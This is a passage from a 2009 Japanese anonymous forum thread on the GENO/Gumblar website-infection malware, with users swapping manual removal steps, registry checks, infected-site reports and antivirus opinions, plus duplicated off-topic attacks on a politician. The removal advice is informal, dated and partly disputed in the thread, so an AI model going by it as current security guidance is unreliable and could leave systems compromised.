HKEY_LOCAL_MACHINE\Software\CLASSES\dllfile
HKEY_LOCAL_MACHINE\Software\CLASSES\exefile
HKEY_LOCAL_MACHINE\Software\CLASSES\sysfile
403192.168.0.774:2009/06/13(土) 22:50:21 ID:olk3r39Z0
>>401
人に質問しながらでないとできないなら復旧はまず不可能。
素人に簡単に駆除できるようならこんなに問題にはならんからな。
黙って再インストールしてくれ。
404192.168.0.774:2009/06/13(土) 22:57:34 ID:ARaQrfiq0
405192.168.0.774:2009/06/14(日) 00:59:16 ID:C/M8+vVy0
このスレは、初心者サポート期間は終了しましたので
406192.168.0.774:2009/06/14(日) 19:12:44 ID:EPArmPcM0
1.regeditが直接起動しないので、ファイル名指定でcommandを実行、DOS窓を出す。
2.DOS窓からregeditを起動。
3.下記レジストリデータを確認。あれば感染している
  HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux?
4.キー指定のファイル名をC:\WINDOWS\から削除
5.正常なsqlsodbc.chmファイル(サイズ50727byte)をC:\WINDOWS\system32\に上書きコピー
6.先程のレジストリデータを削除。
7.下記のキーが無いことも確認する。
  HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperation
8.再起



5の 正常なsqlsodbc.chmファイル(サイズ50727byte)をC:\WINDOWS\system32\に上書きコピー
の詳しいやり方おしえて
407192.168.0.774:2009/06/14(日) 20:02:46 ID:/NaUDULu0
しつこいな
408192.168.0.774:2009/06/14(日) 20:12:05 ID:EsGyl6A+0
>>406 クリーンインストール
409192.168.0.774:2009/06/14(日) 20:12:49 ID:o1wDCDqN0
エロサイト見た後でブラウザ閉じたら、いつの間にか別にウィンドウが開いていて
こんな不明なサイトが見つかりますた
わたすは大金持ちになったのですかそうですか
http://www.freelotto.com/register.asp?skin=Cert&noepu=1&partner=1060373&affiliateid=
410192.168.0.774:2009/06/14(日) 20:54:11 ID:EsGyl6A+0
で、それがGENOと何の関係が?
411192.168.0.774:2009/06/14(日) 23:01:31 ID:9CFoS/uv0
スレないにGENOウイルス駆除ツールに関するリンクが貼られているというのに>>406は何なんだ?
412192.168.0.774:2009/06/15(月) 09:33:14 ID:KVqrUa+P0
だからもう、助けてクレクレは、【いぢったりしないで】スルーしようぜ
外付けブートできるヤツくらい、リアルにひとりやふたりいるだろ
今回は同梱されてなかったが、ルートキットくらい、自分で始末しろ。
いまこのスレは、そういうレベルに戻ってる

面倒見のいいヤツは流出したんだ。あいつらは流動してる。(それでいいけど)
そして、周辺に大規模感染があれば、またふらりと戻ってくる
413192.168.0.774:2009/06/15(月) 20:47:44 ID:t5CdTQZr0
パソコン一台でも普段はウイルス対策をしっかりやったwindows
ネットサーフィンのときはLinux系を使えばGENOと同じ感染プロセスのウイルスは防げるのかな?
414192.168.0.774:2009/06/15(月) 20:53:55 ID:KVqrUa+P0
インターネッツライフをLinux系で賄えるなら、いまんとこかなりの脅威は回避できる
Macですらかなり間に合うのに、Linuxならしばらく安泰

お約束で触れておくなら、ソーシャルハック系(騙されて垢を奪われる)はLinuxだろうと防げない
死角はゼロにならないので、露出狂にならんようにw
415192.168.0.774:2009/06/15(月) 23:30:35 ID:HQGGj4ptP
終息した?
416192.168.0.774:2009/06/15(月) 23:44:36 ID:8i7xfZWb0
>>415
氏ね
能無し
417192.168.0.774:2009/06/16(火) 08:40:55 ID:x4DnqVnv0
何突然興奮してるんだろ
418192.168.0.774:2009/06/16(火) 13:58:05 ID:IgQj6kkj0
潜伏期間が過ぎて発症したんだろ。
419192.168.0.774:2009/06/17(水) 09:49:16 ID:mVglo+DJ0
「PDF」ウイルス、アダルトサイトに仕掛けられる――G Data が報告 (インターネットコム)
ttp://news.www.infoseek.co.jp/topics/comp/n_virus__20090617_4/story/20090615internetcomwe01/

これって関係ある?
420192.168.0.774:2009/06/17(水) 10:24:46 ID:JPvfv0Nw0
似てれば似てると書くと思うんだよな
日頃のこつこつとした対策が重要なのは共通。

このまま、随所のGENO系ウイルススレは、大規模webウイルススレになっていくのかな

ちなみに、GENOと名がついていて、GENO(店舗)のことを扱ってるのは除くと、主なところで
・ここ
・同人板
・セキュ板
・女向ゲー一般板
・パソコン一般板
・同人ゲーム板
・ネットwatch板
にスレがある様子(find.2ch.net検出順)。
421192.168.0.774:2009/06/17(水) 11:22:35 ID:wFOzdNIP0
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
GENOウイルススレ ★21 [セキュリティ]
乙女&BL@【公式感染】GENOウイルス注意喚起スレ2 [女向ゲー一般]
【報告専用】同人サイト向け・GENOウィルス注意11 [同人]
【明光○塾】女子中学生の生徒と淫行三昧★178【講師たかゆき】 [ニュース議論]
【明光○塾】女子中学生の生徒と淫行三昧★177【講師たかゆき】 [ニュース議論]

422192.168.0.774:2009/06/17(水) 16:25:35 ID:6ER87SJA0
GENOより強力な新型が出現したみたいだけど
これって、Acrobat Reader のJavaScript実行をOFFにしていても防げないの?
↓  ↓  ↓  ↓  ↓  ↓  ↓  ↓  ↓  ↓  ↓  ↓  ↓  

〓PDFの脆弱性をつくアダルトサイトに要注意--G Data Softwareが警告〓
http://japan.cnet.com/news/sec/story/0,2000056024,20395086,00.htm

<抜粋>これらのサイトはインラインフレームを含んでいるため、PDFファイルを埋め込むことが可能になっている。
実際にPDFが表示されるわけではないが、 PDFの脆弱性を利用してユーザーにマルウェアを送り込むことから、
通常は「PDFウイルス」と呼ばれている。リンクされているPDF文書は中国にあるサーバに置いてあり、ユーザーが
アダルトサイトのページを開いた瞬間に、AcrobatのプラグインがそのサーバーらPDFを読み込もうとして、実際には
ウイルスをロードしてしまう。
423192.168.0.774:2009/06/17(水) 23:17:23 ID:cNPieBDU0
悩むくらいならReaderごとアンインスコしたほうがいい
424192.168.0.774:2009/06/18(木) 12:57:44 ID:oSNBi7b+0
今大変なことになっている新種のウイルス「Nine-Ball ナインボール」を検出できるのはわずかのベンダーのソフトのみ(米セキュリティ企業公表)

http://www.virustotal.com/analisis/62254bf6a13a438bc53c0f3745c622c5c1604aa37e4f866036a1e94c35cc68f7-1245137075
425192.168.0.774:2009/06/19(金) 12:42:57 ID:1dktemNX0
“けん"を変換すると“ロン"が出るんだけど、これって何かある?

代わりに“ケン"が出ない
(一文字ずつなら出せるけど)

GENOはこのまえ症状がそっくりでリカバリしたけど、セキュリティは前のままなんで
426192.168.0.774:2009/06/19(金) 13:31:32 ID:PsMl7UOK0
そういうの、あるよ。
GENOが流行るずっと前から、特定の単語を打ち込むと、
全然関係ない単語に変換されちゃうの。
気持ち悪いけど、人に言う分には面白いし直し方分からんから放置してる。
427192.168.0.774:2009/06/19(金) 14:04:26 ID:l7tIMz7M0
>>425
前のままじゃダメだと自覚があるならそこを直せばいいのに
428192.168.0.774:2009/06/19(金) 17:13:02 ID:1dktemNX0
じゃあマザーボードがおかしいのかもしれんな

>>427
やっぱねウィルスソフトもねアホらしいしね、1年くらいなら最新入れんでも大丈夫な気がするじゃん
去年の11月に更新終了して、今年の終わりにノートン2010だっけ?出たら買おうかと思ってる
429192.168.0.774:2009/06/19(金) 22:01:56 ID:l7tIMz7M0
なんだ釣りだったのか
430192.168.0.774:2009/06/19(金) 22:24:10 ID:EWSkSKSu0
>ウィルスソフト
この時点で釣り決定
431192.168.0.774:2009/06/22(月) 13:12:26 ID:OFcMMviC0
GENOウイルススレ ★22
http://pc11.2ch.net/test/read.cgi/sec/1245640557/
432192.168.0.774:2009/06/22(月) 13:13:45 ID:Qff0AEDv0
アフィは許せる(スルーするだけだ)が、こんなにそこいら中に次スレはいらんぞw 消化していこうぜ
433192.168.0.774:2009/06/22(月) 13:17:35 ID:UL1vSPoA0

めいめいすきなところに移動汁
434192.168.0.774:2009/06/22(月) 13:20:15 ID:UL1vSPoA0
途中送信してしまった

セキュ板994の人が「めいめいすきなところに移動汁」
つってんだから好きなところに書き込めばいいんじゃね
435192.168.0.774:2009/06/22(月) 21:51:07 ID:zjMZOGeY0
いらないって言われてるのに立てるとか…
436192.168.0.774:2009/06/22(月) 22:00:03 ID:n9xFzxJy0
誰も書き込まなければそのうち落ちるんじゃね
初質板の鑑定スレみたいに双方がアラシ呼ばわりする事態だけは避けてほしいが
437192.168.0.774:2009/06/22(月) 22:48:53 ID:WFTQ6v550
そういえばあったな。向こうはIDでないとかで
438192.168.0.774:2009/06/22(月) 23:05:58 ID:n9xFzxJy0
まぁ、ここの人たちはIDなくても見分けつく人が多いから大丈夫だと思うけどね
対立を演出したいやつにウイルスコード貼られてもスルーしてるし
439192.168.0.774:2009/06/23(火) 04:14:43 ID:aGFOinC00
真するできないねえ
440192.168.0.774:2009/06/23(火) 06:22:28 ID:etrZRzT30
└(゚∀゚└)真する!真する!!(┘゚∀゚)┘ 真する!真する!! (:D)| ̄|_
441192.168.0.774:2009/06/23(火) 06:28:16 ID:87zUBhtd0
わけのわからないAA貼り付けてごまかそうとしても無駄だよ!!!!

もう一度確認しておこう。
テクノの元祖はスナインコッコスマナラコッサーラ長老。
442192.168.0.774:2009/06/23(火) 06:31:32 ID:etrZRzT30
(´;ω;`)  (´;ω;:;.:...  (´;:;.:.:;.:...  .:.:;.:......
443192.168.0.774:2009/06/24(水) 11:19:53 ID:thH4Vr8L0
>>432
>アフィは許せる(スルーするだけだ)

もともとGENOチェッカーの精度が問題だって話だったのに
いつのまにアフィが焦点になったんだって希ガス O o。(´Α`)
444192.168.0.774:2009/06/24(水) 21:30:38 ID:qVqYmhkg0
テンプレ勝手に変えるから
445192.168.0.774:2009/06/24(水) 22:44:50 ID:kaNkJ5AZ0 BE:530136544-2BP(0)
>>443
ともあれ手を動かすって考えには賛同してる 失敗を恐れるのが普通だし、これがなかなかできない
やるなら、精度向上を続けるとか、停止するその日まで(削除ではなく、跡地にすればいいと思う)、
サポートを続けないととは思うけどね
446192.168.0.774:2009/06/24(水) 22:46:48 ID:kaNkJ5AZ0
…ただし、一般論として、人の不幸を、直接小銭の種にしようってのは、
受け入れられるか否か、文化によるかなと
447192.168.0.774:2009/06/24(水) 22:59:37 ID:qVqYmhkg0
あのサイトそのものにはべつになんのアレも無い。スキにすればいい
テンプレ勝手に変えてwikiなんかのリンク外ス奴がでなきゃね
>wiki、2ちゃんねるの情報は、誰でも書き込みできてしまうので、信憑性に欠き、初心者の方は惑わされやすいです。
本人じゃないでしょさすがに
448192.168.0.774:2009/06/24(水) 23:15:52 ID:eGt3q4yV0
>信憑性に欠き

ひどい日本語だ
449192.168.0.774:2009/06/25(木) 03:35:49 ID:8ZyQJlBp0 BE:397602162-2BP(0)
うまく言えないな、、 直接小銭の種にしようとしてるかはわからないし、
直接小銭の種にしようとしてるとみなされるかどうかもわからない。

このまま、日本がターゲットに選ばれなければいいなと。なんとなく。
450192.168.0.774:2009/06/25(木) 21:45:01 ID:N/dc4Nk50
……。
451192.168.0.774:2009/06/25(木) 21:58:12 ID:CiB5GY6i0
406 名前: ◆XcxlmnqGqU [sage] 投稿日:2009/05/30(土) 19:57:35
>>403
全く安全
多くのウイルスがJavaScriptを介して、pdf、swf等を読み込ませるからJavaScriptが問題だと勘違いされがちですが、
javascript単体にはローカルファイル操作、レジストリ改変等を行う機能は存在しません
よってその対処法を導入していれば持続的な被害に合うことは一切ありません




>>404
雑魚は黙ってなさい

495 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/31(日) 17:31:04
幸せサーバープロジェクト 「アイデア・技術のある人募集中」★3
http://qb5.2ch.net/test/read.cgi/operate/1241361889/
XcxlmnqGqU 192-319 424

499 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/31(日) 18:10:08
運営スレであんだけファビョって
インターネット板とセキュ板のテンプレ勝手に変えて新スレたてて
今度は何をしてくれるのかな

646 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/06/04(木) 16:25:44
★同人新スレにアフィが追加されました!

【報告専用】同人サイト向け・GENOウィルス注意11
http://changi.2ch.net/test/read.cgi/doujin/1244096936/
452192.168.0.774:2009/06/25(木) 22:29:39 ID:u/8UXvhn0
>>451
一個目、何度見てもジワジワくる
453192.168.0.774:2009/06/26(金) 03:04:11 ID:wSR8F7l40
皮肉屋ですね(笑)
454192.168.0.774:2009/06/26(金) 03:05:03 ID:5xv1P6lY0
>>451の話はJavaのところが問題なのにな
455192.168.0.774:2009/06/26(金) 04:21:57 ID:wSR8F7l40
そ、そうですね A^-^;)
456192.168.0.774:2009/07/02(木) 00:36:56 ID:lL97EwEVP
このウイルス思ったけど被害がなかったようだね
おまえらに釣られて騒ぎすぎたぜ
457192.168.0.774:2009/07/02(木) 14:11:39 ID:dPCiJwkr0
>>456
騒いだからサイト閉じられて被害が少なかったとは思えんのか?
458192.168.0.774:2009/07/02(木) 16:08:14 ID:XV4YJu590
被害あったってゾンビになっちゃったかもしれないやつらは気づいてないだろ
459192.168.0.774:2009/07/02(木) 19:55:54 ID:DAKHPjSE0
それに感染に気付いていても、サイト持ちじゃないから実害ないし
このままでもいいよね的なカキコをしてた奴が複数いた事を考えると
自覚していながら放置組も相当いるかも知れない。
そしてそれらPCがボットネットに組み込まれているであろう事を思えば。。。
後で「実は抜かれてるのは個人情報もでした」となったら阿鼻叫喚かもな。
460192.168.0.774:2009/07/02(木) 20:03:21 ID:hEHmcCZ90
データ破壊系ではないウイルスなら個人情報を抜かれるかも
と考えると思うんだが、実害ないしいいやと思えるのがわからん
461192.168.0.774:2009/07/02(木) 21:10:06 ID:rR8NeVNy0
そんなやついんの
462192.168.0.774:2009/07/02(木) 21:52:57 ID:HR77S6HE0
いるよ。「WinPCでネットやってりゃ多少なりともウイルス飼ってるのが普通」
ぐらいのこと、平気で言うやついるし
463192.168.0.774:2009/07/02(木) 22:37:03 ID:1AbxG1a50
GENO全盛期に
「ネットで買い物しないしPCメールしないし個人情報無いから別に感染してもいいや」て言われた
464192.168.0.774:2009/07/02(木) 23:42:59 ID:rR8NeVNy0
クッキーごときを検出しまくったへいがい
465192.168.0.774:2009/07/03(金) 03:56:49 ID:EjGCdy4A0
>>462-463
いたね、そういう人。言われた人はホントお気の毒だった
ネットやっててウイルスに感染する覚悟を持つことと
ウイルス貯蔵庫兼配給部隊になることとは別問題のはずなのに
前に女向ゲー一般GENOスレで見たネット版「腸チフスのメアリー」
そんな人がゴロゴロしてるんだろうな
466192.168.0.774:2009/07/03(金) 08:24:53 ID:TmNzMHZD0
本人にその意思がなくても、第三者に電子計算機を利用され、
他者の電子計算機器等に障害を発生もしくは破壊行為を行った場合、
○○万円以下の罰金もしくは懲役○○年に処す

くらいの法律がないと、「俺は悪くない」で済んじゃうからな。

現段階では、プロパイダが責任を持って通信遮断を行うことになってるんだっけ?
467192.168.0.774:2009/07/03(金) 09:45:50 ID:F0OTa+om0
いづれパソコンも免許がいるようになる

バカはパソコンを使えない時代が来るってこったw
468192.168.0.774:2009/07/03(金) 18:22:00 ID:EjGCdy4A0
>>466
http://internet.watch.impress.co.jp/cda/news/2007/05/31/15889.html

愚痴らし

なんか無茶鰤がすぎるんですけど

469192.168.0.774:2009/07/03(金) 21:16:59 ID:mm3IBTQg0
たしかに、そういうこと熟知してる者のレスに見えるな
そういや前スレでも法に精通した香具師がいたが、お仲間か
470192.168.0.774:2009/07/04(土) 15:39:06 ID:eC8cizyU0
ムチャ振り(・A ・)イクナイ!
せめて釣り氏さんみたいに誘い受けにとどめれ
と言いたいところだが、>>466のは普通に質問

なんでもかんでも自分へのレスだと思い込むのは
2ch初心者がよく陥る罠。それを諫めるために有名な
「2chにはひろゆきと俺とお前だけ」のコピペがある
471192.168.0.774:2009/07/04(土) 16:20:10 ID:tMN9XWSy0
てか実際、2chにはつーかネットの中には
オレとオマエとひろゆきだけ
472192.168.0.774:2009/07/04(土) 17:33:15 ID:mOYjbOaL0
全部俺の自演
473192.168.0.774:2009/07/04(土) 18:41:54 ID:eC8cizyU0
ぶっちゃけ世界には、おれとおまえと
ひろゆきだけ。後は全部おれのスタンド
474192.168.0.774:2009/07/04(土) 19:23:52 ID:tMN9XWSy0
ひろゆきさんはどこまでもついてくるんですね(笑)
475192.168.0.774:2009/07/04(土) 19:27:53 ID:eC8cizyU0
そりゃオマ、ひろゆきは…
おや?こんな時間に誰か来たようだ






476192.168.0.774:2009/07/04(土) 20:58:27 ID:VfNAT2grP
477192.168.0.774:2009/07/07(火) 10:31:14 ID:O20iNlf+0
関連: ばりゅどめたんに埋め込みスクリプトあらわる

ばりゅどめ側は駆除済みだが、顛末が読める
攻撃鯖は生存中 検体クレクレたん(俺含む)は急げ

VALUE DOMAINってどうよ? part33
http://pc11.2ch.net/test/read.cgi/hosting/1246828727/
478192.168.0.774:2009/07/10(金) 00:24:44 ID:aAq3fgTNO
genoに感染しました。
aから始まるウィルスチェッカーだと駆除できるというのをみて、インストールしたら、
うっかり再起動してしまい、ブルースクリーンで動かなくなってしまいました。
どうすればよいのでしょうか
479192.168.0.774:2009/07/10(金) 00:51:58 ID:uLP/X9D10
それ本当にGenoなの?
とりあえずOSいれなおせばいいよ
480478:2009/07/10(金) 00:58:39 ID:aAq3fgTNO
まとめにかいてあるのは試しました。コマンドプロテクトのです。
今一人暮らしをしていて、実家にosのCDrおいてます。
もし買うとしたらいくらぐらいですか?
481192.168.0.774:2009/07/10(金) 01:05:02 ID:wORF7xaw0
WindowsXP Home SP3 \11,820 1's
482192.168.0.774:2009/07/10(金) 01:42:39 ID:35zxjN7l0
26 名前: シラネアオイ(アラバマ州)[sage] 投稿日:2009/07/09(木) 21:25:01.62 ID:9KONbv8B
エスエスハニーこと東国原英夫知事、自由民主党総裁候補 >>1-5

1986年ビートたけし、たけし軍団と共に講談社を襲撃し、暴行罪で現行犯逮捕 有罪判決(執行猶予)
1998年児童福祉法違反並びに東京都の青少年健全育成条例 違反の容疑で事情聴取、18歳未満とは知らなかったで法的に罪を免れた
ここがヘンだよ日本人で警察官も制服脱げば、俺と同じ事みんなやってるんだよという主旨の発言を繰り返していた

1999年オフィス北野の忘年会で、北海ジャンジャンの側頭部を蹴り傷害容疑で書類送検 罰金の略式命令


2008年交際していた女性に避妊をしないで行為し妊娠したら堕ろせと手切れ金150万円払う

http://nagamochi.info/src/up21093.jpg  
http://nagamochi.info/src/up21094.jpg
宮崎県の借金を100億円増加させちゃいましたが宮崎を土建化せんといかん!
道路があれば介護も福祉もいらんとです!
道路さえあれば年金問題も解決するとです!
道路さえあれば国の借金900兆円もどげんかなるとです
483192.168.0.774:2009/07/10(金) 01:43:32 ID:35zxjN7l0
26 名前: シラネアオイ(アラバマ州)[sage] 投稿日:2009/07/09(木) 21:25:01.62 ID:9KONbv8B
エスエスハニーこと東国原英夫知事、自由民主党総裁候補 >>1-5

1986年ビートたけし、たけし軍団と共に講談社を襲撃し、暴行罪で現行犯逮捕 有罪判決(執行猶予)
1998年児童福祉法違反並びに東京都の青少年健全育成条例 違反の容疑で事情聴取、18歳未満とは知らなかったで法的に罪を免れた
ここがヘンだよ日本人で警察官も制服脱げば、俺と同じ事みんなやってるんだよという主旨の発言を繰り返していた

1999年オフィス北野の忘年会で、北海ジャンジャンの側頭部を蹴り傷害容疑で書類送検 罰金の略式命令


2008年交際していた女性に避妊をしないで行為し妊娠したら堕ろせと手切れ金150万円払う

http://nagamochi.info/src/up21093.jpg  
http://nagamochi.info/src/up21094.jpg
宮崎県の借金を100億円増加させちゃいましたが宮崎を土建化せんといかん!
道路があれば介護も福祉もいらんとです!
道路さえあれば年金問題も解決するとです!
道路さえあれば国の借金900兆円もどげんかなるとです
484192.168.0.774:2009/07/10(金) 02:46:43 ID:uLP/X9D10
>>480
ドライバもわからんだろうし実家から送ってもらうのが楽だよ
あとセキュリティ対策ソフトは最新のものを買ってね!
OS入れなおしたらOSと各種ソフトを最新にしてね
485192.168.0.774:2009/07/10(金) 03:03:59 ID:zy8UayzW0
>>480
CDRと小冊子くらいならメール便が安くて安全だと思うよ。
それと、アップデートとセキュリティ対策が整うまでは、
必要最低限のWebページ以外は開かないほうがいい。
486478:2009/07/10(金) 09:22:17 ID:aAq3fgTNO
アドバイスありがとうございます。
CDrは部屋の奥底にあるので家族に見つけて
もらうのは難しいです。
8月に実家に帰るのでそれまで使用はやめます。

質問が二つあります。
1 ブルースクリーンしかでない今、データの復帰はできますか?
2 usbにいくつかフォルダを移しました。
ウィルスが移ってないかわかりますか?
487192.168.0.774:2009/07/10(金) 09:25:46 ID:DM8bUgbH0
感染したのがいわゆる「GENO」だと特定できてるなら
システムファイルごっそり移したとかじゃなけりゃ2は問題無いと思う
1はCDぶち込んで電源いれればクリーンインスコできると思う
488192.168.0.774:2009/07/10(金) 10:33:00 ID:TH9/JGS90
外付けブートCDか、ブートUSBを持っておくべき。今回はいい時期。
489192.168.0.774:2009/07/10(金) 15:06:26 ID:uLP/X9D10
>>486
データの復帰はID:aAq3fgTNOがすごくがんばればおそらく可能だけど
何に感染してるかわからないのでデータが安全かどうかわからない
同様に何に感染してるか特定できないのでUSBメモリも安全かどうかわからない

Genoだと思ってても本当はどうかわからないし
ほかの何かにも感染してるかもしれないよね
ID:aAq3fgTNOのレスを見る限りはお金を払って業者に頼むか
あきらめるかの二択じゃないかと

ちなみにUSBメモリに感染するウイルスの場合、他のPCで使用することにより
感染を広げることもあります
どうせ自動起動しちゃうだろうし不用意に確認しようとするのは危ないよ
490192.168.0.774:2009/07/10(金) 15:34:14 ID:zy8UayzW0
>>486
クリーンインストールし、全ての設定が終わった上で、
ウィルス対策ソフトをインストールして、ソフトのバージョンおよびウィルスパターンを更新して、
自動再生を切ってからデバイスを差し込んで、ウィルス対策ソフトにUSBをスキャンさせる。
491192.168.0.774:2009/07/12(日) 23:16:09 ID:C4vtbwjH0
伸びてるとおもったらこれか
こわい
492478:2009/07/16(木) 18:50:22 ID:aablVawQO
先日はアドバイス沢山ありがとうございました。

実家からCDrを送ってもらい、パソコンに入れたのですが、
ようこそ→ブルースクリーン
でクリーンインストールできませんでした。
修理にださないと無理でしょうか?
493192.168.0.774:2009/07/16(木) 23:50:30 ID:+Jh03mtC0
とりあえずPC詳しい奴にみてもらえw ファンが腐ってるかもしれんぞ
494192.168.0.774:2009/07/17(金) 02:39:58 ID:aJGYHCxV0
>>492
CDブートにしてないだろ
取説ちゃんと読んでくれ
わからんなら買ったメーカーのサポートにでも電話してくれ
495192.168.0.774:2009/07/22(水) 12:44:07 ID:9yC5JkR90
システムをクリーンインストールした後はどうしたらいいん?
サーバ内に設置したhtmlファイルなどは一旦全消しすんのかな?
496192.168.0.774:2009/07/22(水) 14:18:30 ID:PLKvcPQ00
>>495
あ?
パソコン持って逃げろ。
497192.168.0.774:2009/07/23(木) 19:32:53 ID:Y39ARKpc0
そしてお前はこう言う
498192.168.0.774:2009/07/23(木) 19:51:31 ID:pgIxqnE50
逃げちゃダメだ。
499192.168.0.774:2009/07/23(木) 20:36:24 ID:PXRCXHeF0
逃げちゃダメだ。
500192.168.0.774:2009/07/23(木) 22:21:53 ID:BgO9MD6O0
>>495
どういう問題が起こってるか理解できないなら閉鎖すべき
501192.168.0.774:2009/08/17(月) 14:57:37 ID:hbGGuN4M0
既出かもしれんが
ちんこアプロダっていう同人誌うpしてるサイトがGENOウィルスに感染してることが判明した。
たまに見てた奴とかは気をつけろよ。

しばらくはアクセスしない方がいい。
502192.168.0.774:2009/08/17(月) 21:10:39 ID:zz5TreCn0
今更だけど、横浜市役所もやられてたのね。
ゾンビPCが市役所の中に残ってないといいんだけど・・・
ttp://safebrowsing.clients.google.com/safebrowsing/diagnostic?hl=ja&site=city.yokohama.jp
503192.168.0.774:2009/08/17(月) 21:47:46 ID:ZC/t7WDI0
>>501
今感染してるの?いままでと使われてる脆弱性は一緒?
それとも未知の脆弱性が使われてるの?
504192.168.0.774:2009/08/18(火) 15:07:14 ID:yHZM8N0b0
何気なくCCCクリーナーやってみたら
JS_GUMBLAR.ERKが検出された。ぐぐってもほとんど情報なし。
つか5月にGENOに感染してリカバリしたってのに。
その時はとにかくまとめwikiにある症状とドンピシャだったんだけど、
今回はなんか重いな、と時々CPUが100になってすぐ戻る。位の症状だった。
ノートン先生は検出せず。
やたらとトロイアタックが来てたのはそういうわけだったのか?

CCCのログ見ると検出された場所が
C:\Documents and Settings\○○○○\My Documents\katjusha\kakikomi.txt [JS_GUMBLAR.ERK]
なんでこんなとこが感染??(↑[ ]内は検出されたウィルス)
505192.168.0.774:2009/08/18(火) 15:16:58 ID:0i2srOIl0
>>504
それウイルスじゃなくてJavaScriptの文字列がどっかに残ってて反応するんじゃなかったか?
つか名前の先頭にJSって付いてるしな
506192.168.0.774:2009/08/18(火) 16:42:27 ID:l+rBKTqS0
>>504
CCCクリーナーについてkwsk
507192.168.0.774:2009/08/18(火) 16:51:32 ID:RLJ3E0Kh0
508192.168.0.774:2009/08/18(火) 20:18:26 ID:dL5Wim8Q0
>>504
おまえ過去にGENO関連スクリプトをどっかのスレに貼りやがっただろ
509192.168.0.774:2009/08/18(火) 20:19:09 ID:dL5Wim8Q0
日本語でおkだった
510504:2009/08/19(水) 11:38:59 ID:DbCeAkRW0
>>508
そんなことしてないよ〜
GENOでリカバリして以来、かちゅ〜しゃ入れたものの
ほとんど起動してなかったし書き込みも1、2回程度。
しかもそれも既女板だし。
ログ見てみたけど該当するJSから始まるウィルス名はなし。
だからkakikomi.txtから検出されたのが???なわけ。
511192.168.0.774:2009/08/19(水) 16:00:06 ID:8YMbZHjT0
514 名前:名無しさん@お腹いっぱい。[] 投稿日:2009/08/19(水) 15:49:34
とあるブログにウイルスバスターのフィッシングレベルを高にすれば
GENOウイルス系をほぼ100%防げるってあったけどウイルスバスターって意外と凄いと思った
512192.168.0.774:2009/08/20(木) 05:00:33 ID:kk6VBHkM0
ttp://safebrowsing.clients.google.com/safebrowsing/diagnostic?hl=ja&site=nii.ac.jp

> Google が最後にこのサイトを巡回したのは2009-08-19で、
> このサイトで不審なコンテンツが最後に検出されたのは2009-08-19です。

国立情報学研究所はちゃんとGENOの駆除を済ませたんだろうか?
513192.168.0.774:2009/08/20(木) 11:02:09 ID:0pZFhpsy0
変なものは入ってなく見えるけどなあ
そこの子サイトよく使うんで、会社のPCもうちのPCも一応チェックしとくか
514192.168.0.774:2009/08/20(木) 13:01:02 ID:kk6VBHkM0
「nii.ac.jp」から絞り込んでみた。
ttp://safebrowsing.clients.google.com/safebrowsing/diagnostic?hl=ja&site=wwwsoc.nii.ac.jp

> このサイトで過去 90 日間に Google がテストした 1030 ページのうち
> 3 ページで、ユーザーの同意なしに不正なソフトウェアがダウンロードされ、
> インストールされていたことが判明しました。

感染歴があるのは「wwwsoc.nii.ac.jp」だけかな?
515192.168.0.774:2009/08/20(木) 14:00:22 ID:RCyIYJ870
>>514
そのアドレスだと下位を各学会が使ってたりするからなあ
516192.168.0.774:2009/08/22(土) 09:37:06 ID:jhIYmbtr0
>>504
ウェブ改ざんウイルス「JS_GUMBLAR.ERK」が初登場2位 - トレンド週間ランキング
ttp://www.security-next.com/011035.html

で、バスターのパターンファイル追加の該当リスト(2009/8/9)
ttp://matcha139.hiemalis.org/~isamik/ptn/6.351.00.txt

バスターのパターンファイルへJS_GUMBLAR.ERKが追加されたのが2009/8/9っぽいから、
単に今まで検出できなかったのが、今になってやっと検出できるようになっただけの希ガス
517192.168.0.774:2009/08/22(土) 12:33:21 ID:B5xgqliz0
1ヶ月ぶりにGENOの感染確認してみたら
sqlsodbc.chmのボリュームが2,894,207 バイトになってた・・・
これ感染してるんだよね・・・やべえ・・・
518192.168.0.774:2009/08/22(土) 12:52:46 ID:rMzmO16b0
いまさら感染?
ブラウザの種類とかブラウザの設定とかウイルス対策ソフトとかどうしてたの?
519192.168.0.774:2009/08/22(土) 22:10:42 ID:jhIYmbtr0
>>517
sqlsodbc.chmは盗聴のログって話だから、それだけ肥大化しているってことは
かなり色々と盗られたんじゃないかって気がする。

とりあえず、ご愁傷様としか。再インストールしてパスワード全部変えた方が良いでしょうね。

どこのセキュリティソフトを使っていたかわかりませんけど、余裕があるなら
シマンテック等のオンラインスキャンをして、何に感染していたか確認しておくのも、
今後のためには良いかも。
520192.168.0.774:2009/08/22(土) 23:34:12 ID:B5xgqliz0
ごめんーーーー違ったファイルみてたわ・・・・
ちゃんと正常だった
今月の頭にウィルスバスターの使用期間が切れて後で買えばいいかって思ってて
今までセキュリティなしだったんだよね
・・・セキュリティソフトやっぱ買ったほうがいいね
521192.168.0.774:2009/08/22(土) 23:59:52 ID:jhIYmbtr0
>>520
や、正常だったようで、それは何より。

んでも、今使ってるのが期限切れしてるんなら、とりあえず適当な会社の体験版入れてセキュリティを維持するか、
もしくはフリーのでも良いから何か入れておいた方が良いよ。 体験版でも、1ヶ月は市販品と同じ最新状態維持できるし。

※ ただ、KINGとかZEROは避けた方が無難。フリーより検出率悪いから、それら入れるくらいならフリー使った方が良い。

あと、個人的には、最近バスターはパターンファイルの作成遅れが多くなってきたんで、これも避けた方が良いかも。
(>516みたいな話ね。ウチの会社バスター使ってるんで、ちょっと頑張って欲しいところではある。)
522192.168.0.774:2009/08/27(木) 16:01:29 ID:wRk6Vuyp0
avast か AVG か...
avast使ってるけどどうもこのごろ心配だなあ
あとファイアウォールもいるけど
COMODO ,Outpost, Online Armor, PC Toolsがあるけど
PC Toolsがわかりやすいらしいというのを見た記憶がある。
COMODOは強力だが使いづらい。

523192.168.0.774:2009/09/20(日) 14:33:09 ID:urdUUYmlO
PC初心者です、教えてください。
どうやら感染していたようなのですが、
どういった被害がありますか?
保存していたファイル等が流出してしまったりするのでしょうか?
524192.168.0.774:2009/09/20(日) 18:21:10 ID:qQSKk28C0
>>523
tp://www31.atwiki.jp/doujin_vinfo/
525192.168.0.774:2009/10/05(月) 20:40:47 ID:THEkkja60
wakatta
